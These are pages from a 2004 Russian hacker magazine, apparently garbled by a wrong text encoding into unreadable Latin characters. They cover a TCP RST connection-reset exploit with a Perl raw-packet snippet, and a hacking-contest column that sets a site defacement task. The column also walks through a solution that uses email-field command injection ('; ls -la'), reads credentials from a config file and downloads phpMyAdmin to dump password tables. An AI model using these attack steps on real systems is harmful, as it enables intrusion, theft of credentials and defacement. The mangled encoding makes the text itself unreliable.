ÂÇËÎÌÈÍÒÅÐÍÅÒ ÏÎÄ ÓÃÐÎÇÎÉÕÀÊÅÐ/¹07(67)/2004ÏÐÀÊÒÈ×ÅÑÊÀß ÐÅÀËÈÇÀÖÈßÍî äîâîëüíî óòîìèòåëüíîé òåîðèè! Äàâàéïðîâåäåì ïðàêòè÷åñêèé ýêñïåðèìåíò, êîòîðûéïîêàæåò, äåéñòâèòåëüíî ëè òàêóþñåðüåçíóþ îïàñíîñòü ïðåäñòàâëÿåò ñîáîéýòà óÿçâèìîñòü. Ïîïðîáóåì ïðîòåñòèðîâàòüêàêîé-íèáóäü ýêñïëîéò, ðåàëèçóþùèéîäíó èç âûøåîïèñàííûõ àòàê.  èíåòå âûëîæåíîíåñìåòíîå êîëè÷åñòâî ðàçíîîáðàçíûõñïëîéòîâ äëÿ ýòîãî áàãà, íî ìíåïîíðàâèëñÿ òîëüêî îäèí ãèáêèé Perl-âàðèàíò,êîòîðûé áûë íàïèñàí K-sPecial'îì.Ïðîãðàììà ïîçâîëÿåò îáîðâàòü ñîåäèíåíèåñ ïîìîùüþ RST-àòàêè. Êàê óòâåðæäàåòàâòîð, ïðè òåñòèðîâàíèè óÿçâèìîñòè îíçàòðàòèë âñåãî 3 ìèíóòû íà òî, ÷òîáûóáèòü ñåòåâîå ñîåäèíåíèå. Ïîñìîòðèì,÷òî ïîëó÷èòñÿ ó íàñ :).Èñõîäíèê ýêñïëîéòà è åãî îïèñàíèå ìîæíîíàéòè ïî ññûëêå http://lists.netsys.com/pipermail/full-disclosure/2004-April/020458.html.Ýòîòñêðèïò óìååò ïåðåáèðàòü êàê SN, òàê èSP/DP.  íàøåì ýêñïåðèìåíòå ÿ ïîäêëþ÷óñüê ñâîåìó êîìïüþòåðó ñ óäàëåííîãî øåëëà èïîïðîáóþ ïðåðâàòü ñîåäèíåíèå.Ïðåæäå ÷åì òåñòèðîâàòü áàãó, íåîáõîäèìîáûëî óñòàíîâèòü ìîäóëü Net::RawIP, àòàêæå áèáëèîòåêó libpcap. Ïîäîáíûé êîìïëåêòïîçâîëÿåò ñîçäàâàòü TCP-ïàêåòû â Perlñöåíàðèÿõ.Ïîñëå òîãî, êàê ìîäóëü êîððåêòíîóñòàíîâèëñÿ, ÿ ïðîâåðèë ñèíòàêñèññêðèïòà êîìàíäîé perl -c tcp.pl - èíòåðïðåòàòîðíå ñòàë ðóãàòüñÿ ìàòîì è ìîë÷à ïðîïàðñèëêîä ñïëîéòà.Ïðåæäå ÷åì íà÷èíàòü ýêñïåðèìåíò, ÿ áûõîòåë îáðàòèòü òâîå âíèìàíèå íà êëþ÷åâîéìîìåíò ñöåíàðèÿ:ÓßÇÂÈÌÛÅ ÏÐÎÄÓÊÒÛÒCP-èçúÿíàì â áîëüøåé ìåðå ïîäâåðæåíû ïðîòîêîëûìàðøðóòèçàöèè, à òàêæå íåêîòîðûå îïåðàöèîíêè "æåëåçíûõ"ðîóòåðîâ. Ïîëíûé ñïèñîê óÿçâèìûõ ïðîäóêòîâ (â êîòîðûõîøèáêà ÿâëÿåòñÿ êðèòè÷åñêîé) òû ìîæåøü ïîñìîòðåòü çäåñü:http://security.nnov.ru/search/document.asp?docid=6115. ýòîé æå âåòêå íàõîäèòñÿ åùå îäèí èñõîäíèê ýêñïëîéòà,êîòîðûé èñïîëüçóåò RST-àòàêó íà ñîåäèíåíèå.Îí çàòðàòèë âñåãî 3 ìèíóòû íà òî,÷òîáû óáèòü ñåòåâîå ñîåäèíåíèå.Ñîçäàåì raw-socketÍå ñòîèò çàáûâàòü,÷òî âñåäåéñòâèÿ ïî âçëîìóñåòåé ïðîòèâîçàêîííû.Ýòàñòàòüÿ äàíà ëèøüäëÿ îçíàêîìëåíèÿè îðãàíèçàöèè ïðàâèëüíîéçàùèòû ñòâîåé ñòîðîíû. Çàïðèìåíåíèå ìàòåðèàëàâ íåçàêîííûõöåëÿõ àâòîð èðåäàêöèÿ æóðíàëàîòâåòñòâåííîñòè íåíåñóò.$a = new Net::RawIP;$a->set({ip => {saddr => "$sip",daddr => "$dip"},tcp => {source => $sport, dest => $dport, rst => 1,syn => 1, seq => $i}}) ;$a->send; ïåðâîé ñòðîêå ïðîèñõîäèò ñîçäàíèåîáúåêòà, äàëåå çàïîëíÿþòñÿ âñå íåîáõîäèìûåïîëÿ çàãîëîâêà, à òàêæå óñòàíàâëèâàåòñÿRST-ôëàã. Ïðåäïîëàãàåìûé SN ÿâëÿåòñÿñ÷åò÷èêîì öèêëà.ß ïîäêëþ÷èëñÿ ñ óäàëåííîãî øåëëà íàñîáñòâåííûé êîìïüþòåð. Ïîñëå ýòîãî ïðèÑîáèðàåì ìîäóëü Net::RawIPïîìîùè êîìàíäû tcpdump -i iface ÿ ïîñìîòðåëðàçìåð îêíà - â ìîåì ñëó÷àå îíî èìåëîãðàíèöó 5040.  ýòîì æå âûâîäå tcpdump'à ÿóçíàë è ñîäåðæèìîå ïîëåé SA, SP, DA è DP,èõ íåîáõîäèìî áûëî çàäàòü ïðè èíòåðàêòèâíîìîïðîñå ýêñïëîéòà. Âïðî÷åì, ýòè äàííûåòû ìîæåøü îïðåäåëèòü, âûïîëíèâ êîìàíäónetstat -an íà ëîêàëüíîé ìàøèíå.Çàïóñòèâ ýêñïëîéò è âûáðàâ òðåáóåìûéòèï ïåðåáîðà, ÿ ââåë èçâåñòíûå î ñîåäèíåíèèäàííûå. Ðàçìåð îêíà ìîæíî áûëîîñòàâèòü ìèíèìàëüíûì (õîòÿ ÿ ââåë öèôðó,ïîëó÷åííóþ èç âûâîäà tcpdump). Óñòàíîâèâñòàðòîâûé SN è âðåìÿ ïàóçû íóëåâûìè, ÿíà÷àë çàñåêàòü âðåìÿ è ïåðèîäè÷åñêè ïðîâåðÿëàêòèâíîñòü ñîåäèíåíèÿ. Íå ïðîøëîè 15 ìèíóò, êàê ìîå FTP-ñîåäèíåíèå ðóõíóëî,÷òî, ïðèçíàþñü, âûçâàëî ó ìåíÿ äèêèéâîñòîðã :). 15 ìèíóò - ýòî ðîâíî â ïÿòüðàç áîëüøå çàÿâëåííîãî àâòîðîì ñïëîéòàâðåìåíè, íî ýòî ìîæíî îáúÿñíèòü òåì, ÷òîìåæäó ìíîé è øåëëîì áûë äîâîëüíî óçêèéêàíàë è ïåðåáîð åäâà ëè âåëñÿ íà îïòèìàëüíîéñêîðîñòè.ÔÈÍÀËÜÍÛÉ ÍÅÊÐÎËÎÃÄàæå ïðè äâóõ íåèçâåñòíûõ ïåðåìåííûõ(SN è SP) àòàêà âîçìîæíà.  ïåðâóþ î÷åðåäüïîñòðàäàåò ïðîòîêîë BGP, çàòåì íåêîòîðûåöèñêè (ñî ñëàáîé TCP-ðåàëèçàöèåé).È, íàêîíåö, ïðè æåëàíèè õàêåð ìîæåò ñîðâàòüïðàêòè÷åñêè ëþáîå ñîåäèíåíèå. Åñëè,êîíå÷íî, îí âëàäååò ìîùíûì êàíàëîì è îïðåäåëåííûìèíàâûêàìè âî âçëîìå. Óæå èçâåñòíûïåðâûå êðóïíûå ñðûâû ñîåäèíåíèé,è ýòî íå ïðåäåë, ïîñêîëüêó çàïàò÷èòü ïðîòîêîëTCP íà âñåõ ñåðâåðàõ â èíåòå ïðàêòè-÷åñêè íåâîçìîæíî. Ïîýòîìó â ñêîðîì áóäóùåìæäè èçâåñòèé î êðàòêîâðåìåííîé êîí-÷èíå èíòåðíåòà ;). zÎïðåäåëÿåì êîîðäèíàòû ñîêåòîâ60Îïðåäåëÿåì êîîðäèíàòû ñîêåòîâ
ÂÇËÎÌÕÊÎÍÊÓÐÑNSD (nsd@nsd.ru)ÕÊÎÍÊÓÐÑÇÂÅÇÄÍÛÉÊÀËÅÍÄÀÐÜÕÀÊÅÐ/¹07(67)/2004Ïðèâåò! Êîëèñü, ïðîøåë êîíêóðñ èþíüñêîãî íîìåðà? Åñëèíåò, òî íå ðàññòðàèâàéñÿ, âñòàâëÿé äèñê ñ íîìåðîì 2 èñìîòðè âèäåî î òîì, êàê íàäî áûëî ëîìàòü ïàäîíêîâ ìåñÿöíàçàä. Íó à åñëè ïðîøåë, òî ïîçäðàâëÿþ òåáÿ è âèðòóàëüíî æìóòâîþ óìåëóþ ðóêó! Òîëüêî òû äîëãî ÷òî-òî õàêñîðèë. Áåðè ïðèìåðñ MOTHER_HACKER’à - îí ñäåëàë ýòî ïåðâûì, ïîýòîìó è ïîëó÷èòðóëåçíûé ïðèç! MOTHER_HACKER’ó, êñòàòè, íóæíî ïîäâàëèòü â ðåäàêöèþè çàáðàòü ïðåçåíò è çàîäíî ïîçíàêîìèòüñÿ ñ Õ-crew :).À òåïåðü î äåëå. Êàê òû óæå äîãàäàëñÿ, ÿ õî÷ó ñåé÷àñ ðàññêàçàòü, â÷åì áóäåò çàêëþ÷àòüñÿ çàäàíèå ñëåäóþùåãî êîíêóðñà. Òåáå, êîíå÷íîæå, íå òåðïèòñÿ óçíàòü, ÷åì ðåøèëè çàíÿòüñÿ ÏàÄîÍêÈ â ýòîòðàç.  ýòîò ðàç îíè ðåøèëè íàïèñàòü äëÿ ñàéòà www.padonak.ru çâåçäíûéêàëåíäàðü, ðàñêðóòèòü åãî è ïðîäàâàòü â áóäóùåì ðåçóëüòàòûãàäàíèÿ çà WebMoney. Íó à òåáå íóæíî ïîêàçàòü èì, êòî â èõ äîìåõîçÿèí, è ïîëîìàòü èõ ñàéò www.padonak.ru. Âîò, ñîáñòâåííî ãîâîðÿ,÷òî êîíêðåòíî íóæíî ñäåëàòü:1)  õåðîìàíò-ñêðèïòå íàõîäèøü áàã.2) Íà ñàéòå åñòü áàçà äàííûõ, à â íåé - òàáëèöà ñ ó÷åòíûìè çàïèñÿìèþçâåðåé. Èç ýòîé òàáëèöû òû âûäèðàåøü âñå ëîãèíû ñ ïàðîëÿìè.3) Îäèí èç ïàññîâ ìîæåò ïîäîéòè ê FTP, íó à ëîãèí òåáå ïðèäåòñÿóçíàòü ñâîèìè ñðåäñòâàìè.4) Çàõîäèøü íà ñàéò ïî FTP-ïðîòîêîëó è äåëàåøü êðàñèâûé äåôåéñ.5) Ïîñëå ýòîãî íà ìûëî êîíêóðñà konkurs@real.xakep.ru ïðèñûëàåøü ëîãèíñ ïàðîëåì îò FTP-äîñòóïà è ñêðèíøîò ïîäìåíû ãëàâíîé ñòðàíèöûâ ôîðìàòå BMP.Îöåíèâàòü áóäåì äåôåéñû ïåðâûõ òðåõ ÷óâàêîâ, êîòîðûå ïðîéäóòêîíêóðñ. Îäíàêî íàãðàæäàòü ñòàíåì òîëüêî îäíîãî èç íèõ. ×åéäåôåéñ îêàæåòñÿ ñàìûì êðàñèâûì, òîò è ñòàíåò ïîáåäèòåëåì.ÊÀÊ ÏÐÎÉÒÈ ÈÞÍÜÑÊÈÉ ÊÎÍÊÓÐÑÔè÷à èþíüñêîãî êîíêóðñà çàêëþ÷àëàñü â áàãå, êîòîðóþ ñîäåðæàëñêðèïò ðåãèñòðàöèè reg.php. Ïèñüìà, ñîäåðæàâøèå êîä àêòèâàöèè,îòïðàâëÿëèñü ñ ïîìîùüþ âñåãî ëèøü îäíîé ñòðî÷êè php-êîäà, êîòîðàÿâûãëÿäåëà òàê: system("echo \"user: $login, pin: $pin\". Àêòèâèçàöèþàêêàóíòà ìîæíî ïðîèçâåñòè íà ýòîé ñòðàíèöå: www.padonak.ru/active.php| mail $email");Åñëè ïðè ðåãèñòðàöèè â ïîëå "e-mail" òû ââåë áû, íàïðèìåð,"NSD@Dubovitskaya.ru; ls -la", èñïîëíèëàñü áû êîìàíäà îïåðàöèîííîéñèñòåìû "ls -la" è òû ïîëó÷èë áû ñîäåðæèìîå òåêóùåé äèðåêòîðèè.Èòàê, øåëë-äîñòóï ó òåáÿ òåïåðü åñòü. Âûòàñêèâàåøü ëîãèí ñïàðîëåì èç ôàéëà êîíôèãóðàöèè mycfg.php è ñëèâàåøü êàêîéíèáóäüMySQL-êëèåíò (ëè÷íî ÿ ïîëüçîâàëñÿ phpMyAdmin'îì). Ñíà-÷àëà êîìàíäîé fetch http://voxel.dl.sourceforge.net/sourceforge/phpmyadmin/phpMyAdmin-2.5.7.tar.gzñëèë åãî, ïîòîì ðàñïàêîâàë â òåêóùóþäèðåêòîðèþ, èñïîëüçóÿ êîìàíäó îáîëî÷êè îñè tar xzvfphpMyAdmin-2.5.7.tar.gz. Îñòàëîñü òîëüêî íàñòðîèòü åãî. Äëÿ ýòîãîïðîñòî-íàïðîñòî â ôàéëå config.inc.php ïðîïèñûâàåì âûäðàííûéèç mycfg.php ëîãèí ñ ïàðîëåì. Òåïåðü ÷åðåç àäìèí-èíòåðôåéñ çàõîäèìíà ãëàâíóþ ïàãó óñòàíîâëåííîãî phpMyAdmin'a, ïðîñìàòðèâàåìñîäåðæèìîå ñåêðåòíûõ òàáëèö ÷åðåç óäîáíûé èíòåðôåéñ èøëåì èõ íà ìûëî êîíêóðñà. Âîò òàê :).Íà íàøåì äèñêåòû ìîæåøü íàéòèâèäåî ïî âçëîìó,ïîñâÿùåííîå ïðîõîæäåíèþêîíêóðñà.83